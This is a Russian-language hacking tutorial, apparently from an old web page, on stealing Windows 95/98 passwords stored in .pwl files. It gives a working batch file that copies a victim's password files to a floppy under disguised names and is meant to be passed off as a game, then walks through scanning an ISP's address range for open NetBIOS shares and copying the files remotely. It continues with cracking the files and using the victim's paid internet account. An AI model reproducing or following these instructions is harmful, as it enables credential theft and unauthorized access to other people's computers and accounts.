В
статье описаны способы кражи паролей от Windows 95/98
содержащиеся в файле *.pwl. Описанные способы не
требуют каких либо навыков и доступны
всем. PWL
(PassWord List) - это файл где
хранятся все пароли для доступа в интернет.
Файл в котором
содержаться все пароли Windows находится в папке
C:\WINDOWS\***.pwl, где *** имя пользователя.
Физический доступ к компьютеру
Имея физический
доступ к компьютеру можно:
"Найти" и скопировать все файлы *.pwl на дискету.
написать небольшой *.bat файл, и запустить его с дискеты
на компьютере жертвы под видом игры или программы.
Пример BAT файла. Открываем
"Блокнот" и пишем следующее: @ECHO OFF // отключаем сообщения md saves
// создаем папку SAVES для
сохранения файлов COPY C:\WINDOWS\*.pwl
SAVES\*.pav >> NUL //
копируем все pwl файлы в папку SAVES на дискете под именем
*.pav COPY C:\WINDOWS\system.ini SAVES\*.sav
>> NUL // копируем файл
system.ini в папку SAVES на дискете под именем
system.sav Дальше можно
вывести какое нибудь сообщение об ошибке: ECHO Файл
FLY.DAT не найден // сообшения надо
писать в DOS'овском редакторе типа EDIT
Сохраняем файл под именем
Games.bat и копируем на дискету.
Файлы сохраняются с расширением
.PAV и .SAV для маскировки и в последствии
переименовываются system.sav => system.ini *.pav
=> *.pwl Для маскировки
можно скомпилировать BAT файл в COM с помощью программы
Bat2Exec, а потом переделать COM в EXE с помощью программы
Com2Exe.
Все готово, остается только запустить с дискеты файл Games.exe
и через секунду пароли у вас в кармане.
По сети
Работа в Internet
нечем не отличается от работы в локальной сети. Если вы кому
либо открыли свой диск или папку, и забыли его закрыть
(поставить пароль), то после выхода в Internet ваш открытый
ресурс становится доступным всем. Остается только найти людей
с открытыми ресурсами и утянуть у них заветные пароли.
Для работы понадобиться сканер на
поиск общих ресурсов.
На сегодняшний день этих сканеров достаточно много , и методы работы с
ними практически одинаков. Здесь
мы будем рассматривать пример с использованием Essential
NetTools v3.0.
Для начала нам понадобиться узнать
IP адреса для сканирования, а лучше диапазон IP адресов
предоставляемых вашим провайдером.
Узнаем свой IP: Пуск > Выполнить >winipcfg
или в окне MS-DOS набираем ipconfig.
Узнаем IP диапазон: необходимо воспользоваться системой
WhoIS. Она существует во многих программах, но есть и
бесплатные Internet сервисы.
Вводим свой IP адрес и нажимаем кнопку "Search". Появляется
информация о домене к которому принадлежит IP адрес. Ищем
строчку:
inetnum: 123.45.67.0 -
123.45.67.255 Вот тот диапазон
который нужно просканировать сканером. Также можно узнать
много полезного о провайдере.
Далее запускаем Essential
NetTools. Подробнее о программе можно узнать по ссылке: Share:
Essential NetTools. Переходим на вкладку NBScan.
Starting IP address: - вводим начальный
адрес (123.45.67.0); Ending IP address: - вводим
конечный адрес (123.45.67.255); Нажимаем кнопку
Start. Через несколько
минут ,если все нормально, начнут появляться другие
подключенные компьютеры и информация о них. Пока нам
понадобятся две колонки MAC Adderss и RS.
MAC Address(Адрес контроллера):
44-45-..-..-..-.. - Windows 95/98 00-00-..-..-..-.. -
Windows NT/2000 и другие...... В колонке RS
могут быть 2 варианта: YES / NO. Нам нужен YES.
Ищем компьютер где: RS
= YES MAC Address = 44-45-..-..-..-..
Найдя такой компьютер щелкаем на
нем правой кнопкой мыши и выбираем пункт "Open Computer".
Через некоторое время у вас появится папка содержащая диски и
папки с удаленного компьютера, с ней можно работать как с
обыкновенной папкой, но лучше щелкнуть на ней правой кнопкой и
выбрать пункт "Подключить сетевой диск", зайти в него через
Norton Commander или Windows Commander. Подключившись к
сетевому диску нужно скопировать все PWL файлы из папки
Windows и SYSTEN.INI на всякий случай. Для большей быстроты
лучше копировать через MS-DOS т.к. при роботе через NetBios
другие приложения могут немного тормозить.
A:\windows\copy *.pwl B:\ A:\ - буква сетевого
диска B:\ - место куда надо скопировать файлы
Что делать с файлами
SYSTEM.INI -
этот файл необходим для двух вещей:
- Определить полное имя пользователя, т.к. если имя
состоит из более 8 букв, то название PWL файла будет
состоять из первых 8 букв. Например:
Имя пользователя:
Administrator Имя PWL файла: Administ.pwl
- Определить местонахождение PWL файла, т.к. его можно
перенести в другое место, а путь нужно указать в файле
System.ini.
Открываем
System.ini в Блокноте и ищем строчку: [Password Lists]
ADMINISTRATOR=C:\WINDOWS\ADMINIST.PWL
ADMINISTRATOR - имя пользователя
C:\WINDOWS\ADMINIST.PWL - путь и название PWL файла
*.PWL - в этом файле
зашифрованные хранятся пароли. Чтобы их достать нужно
применить взломщик паролей: PWLTool, PWLHack, PWLView, ...
.
О том как с ними работать описано с статье:
Взлом
PWL.
После взлома
Если у провайдера
можно посмотреть статистику прямо из Интернета, то нужно
посетить сайт провайдера и посмотреть, сколько осталось денег
на счету у пользователя и в какое время он обычно находится в
Интернете. На сайте находятся телефоны модемных пулов, по
которым нужно дозваниваться.
|